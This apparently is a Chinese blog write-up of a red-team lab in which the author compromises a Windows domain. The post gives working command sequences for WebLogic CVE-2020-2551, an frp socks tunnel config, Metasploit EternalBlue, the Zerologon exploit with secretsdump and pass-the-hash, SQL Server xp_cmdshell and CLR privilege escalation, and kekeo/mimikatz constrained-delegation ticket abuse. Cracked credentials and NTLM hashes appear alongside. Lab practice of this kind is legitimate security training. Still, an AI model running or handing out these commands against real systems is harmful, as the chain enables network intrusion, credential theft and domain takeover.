资讯专栏INFORMATION COLUMN

一次内网靶场学习记录

不知名网友 / 3575人阅读

摘要:环境搭建服务器外网内网域内机器内网内网域内服务器内网域控机器内网点击查看技术资料多本网络安全系列电子书网络安全标准题库资料项目源码网络安全基础入门安全攻防方面的视频网络安全学习路线图外网渗透端口扫描搭建好环境,对目标进

环境搭建

web服务器:

外网IP 192.160.0.100

内网IP 10.10.20.12

域内机器win7 :

内网IP 10.10.20.7

内网IP 10.10.10.7

域内服务器 Mssql:

内网IP 10.10.10.18

域控机器:

内网IP 10.10.10.8

→点击查看技术资料←

1.2000多本网络安全系列电子书
2.网络安全标准题库资料
3.项目源码
4.网络安全基础入门、Linux、web安全、攻防方面的视频
5.网络安全学习路线图

外网渗透

端口扫描
搭建好环境,对目标192.168.0.100进行端口扫描探测

目录扫描
发现目标开放了7001端口,进行目录扫描探测,发现weblogic登录口

weblogic漏洞利用

尝试weblogic弱口令登录不成功

通过weblogic漏洞利用工具,发现目标存在CVE-2020-2551漏洞可以利用

出网探测
ping www.baidu.com发现目标机器出网

杀软识别
tasklist /svc 通过进程对比发现主机上没有安装杀软

直接powershell上线cs

内网渗透

信息搜集
通过执行命令whoami /all发现存在双网卡

密码凭据抓取
通过hashdump抓取密码Administrator ccef208c6485269c20db2cad21734fe7

ntlm hash值为ccef208c6485269c20db2cad21734fe7,通过cmd5解出明文密码Admin12345

横向移动
有了明文密码我们可以进行远程登陆,但真实环境中不到万不得已一般不建议执行此操作,因此寻找其他的方法进行内网横向移动

通过上传fscan扫描10网段,发现存在ms17-010漏洞的10.10.20.7主机

一开始打算通过Eternalblue直接上线cs,发现不成功,改用其他方法

项目地址:https://github.com/0xFenrik/Eternalblue

隧道搭建
上传frp搭建隧道代理

[common]#frpc配置server_addr = VPS地址server_port = 7000[plugin_socks]type = tcpremote_port = 1080plugin = socks5[common]#frps配置bind_addr =0.0.0.0bind_port = 7000

永恒之蓝ms17-010
改用metaspolit,调用永恒之蓝模块进行攻击,成功获取shell

msf6 > setg Proxies socks5:frps服务端IP:监听端口msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 > set payload windows/x64/meterpreter/bind_tcpmsf6 > set rhost 10.10.20.7msf6 > run

或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080

然后通过proxychains msfconsole启动

成功后通过mimikatz执行creds_all获取账户密码redteam/saul:admin!@#45

中转上线
由于目标机器win7不出网,因此以跳板机器作为中转,新建一个监听器

通过psexec进行上线

成功上线后进行内网扫描,探测存活主机,发现还存在10.10.10.8和10.10.10.18两台机器

通过信息搜集发现当前机器是在域环境内net user /domain

定位域控
接着定位到域控 net group “domain controllers” /domain

ps:一般来说DNS服务器就是域控

CVE-2020-1472

影响版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)

通过CVE-2020-1472脚本进行检测

项目地址:https://github.com/SecuraBV/CVE-2020-1472

1、重置管理员密钥,进行置空

python3 cve-2020-1472-exploit.py OWA 10.10.10.8

2、通过 Dcsync 查看密码hash

python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass

3、通过psexec和hash获取域控权限

python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7


4、使用secretsdump解析保存在本地的nt hash

reg save HKLM/SAM sam.save
reg save HKLM/SYSTEM system.save
reg save HKLM/SECURITY security.save

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

5、通过reinstall脚本将$MACHINE.ACC:plain_password_hex中的原来nt hash恢复

python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d


约束委派接管域控
1、通过adfind寻找约束委派的用户,发现为sqlserver的机器

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b “DC=redteam,DC=red” -f “(&(samAccountType=805306368)(msds-allowedtodelegateto=*))” cn distinguishedName msds-allowedtodelegateto


2、通过端口探测发现sqlserver为10.10.10.18机器

3、使用fscan进行扫描fscan.exe -h 10.10.10.0/24 sqlserver为弱口令sa/sa


4、使用工具查看当前权限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami

项目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41

5、权限较低,使用以下命令进行提权:

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami


6、上线CS并抓到sqlserver的密码redteam/sqlserver Server12345


根据先前的信息搜集可知 sqlserver 是一个约束委派用户,可以通过约束委派攻击来接管域控

项目地址:https://github.com/gentilkiwi/kekeo/releases

1、利用 kekeo 请求该用户的 TGT

kekeo.exe “tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi”

2、然后使用这张 TGT 获取域机器的 ST

kekeo.exe “tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red”

3、使用 mimikatz 将 ST 导入当前会话,运行 mimikatz 进行 ptt

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

4、成功获取域控权限

最后

点击查看【网络安全学习资料·攻略

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/125546.html

相关文章

  • 内网域渗透分析(实战总结)

    摘要:搭建代理添加一个代理建立了一条由攻击机到服务器的通道,的服务端在攻击机,也是反向代理复制代理链接到中让所有模块的流量都通过此代理走。全局设置允许反向代理,通过反弹,建立双向通道。 ...

    FuisonDesign 评论0 收藏0
  • Vulnhub靶场渗透-Breach1.0

    摘要:简介是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞需要使用或运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的权限和查看靶机信息是一个难度初级到中级的挑战静态,配置环境到同一个网 ...

    lvzishen 评论0 收藏0
  • vulnhub sar 靶场练习

    摘要:前言这次练习的靶机是平台下的,该靶机是一个类似的虚拟机,目的是提高并巩固渗透测试的知识点。收集信息代表存活主机扫描,不进行端口测探。代表综合性扫描,能收集很多重要的信息代表扫描主要的服务信息参数是指定端口,后面的代表所有端口。 ...

    mating 评论0 收藏0
  • Django适合做大用户量的系统吗?

    摘要:百万量级的产品,扛起来并不费力。当你的网站或者接口有一个用户访问时,能在短时间内返回,那么,当用户量达到时,是否能在同样的时间内返回呢这是个问题。对于后端来说,把响应时间控制在合理的范围之内是很重要的。其他的也是类似。 分几点来答: 1. 首先,这其实是个技术选型题。 做技术选型的时候不能单纯的考虑性能,应该优先考虑业务类型,以及团队水平。另外的话,框架只是其中一环,还有配套呢。 如果...

    crossea 评论0 收藏0
  • Django适合做大用户量的系统吗?

    摘要:百万量级的产品,扛起来并不费力。当你的网站或者接口有一个用户访问时,能在短时间内返回,那么,当用户量达到时,是否能在同样的时间内返回呢这是个问题。对于后端来说,把响应时间控制在合理的范围之内是很重要的。其他的也是类似。 分几点来答: 1. 首先,这其实是个技术选型题。 做技术选型的时候不能单纯的考虑性能,应该优先考虑业务类型,以及团队水平。另外的话,框架只是其中一环,还有配套呢。 如果...

    DataPipeline 评论0 收藏0

发表评论

0条评论

不知名网友

|高级讲师

TA的文章

阅读更多
最新活动
阅读需要支付1元查看
<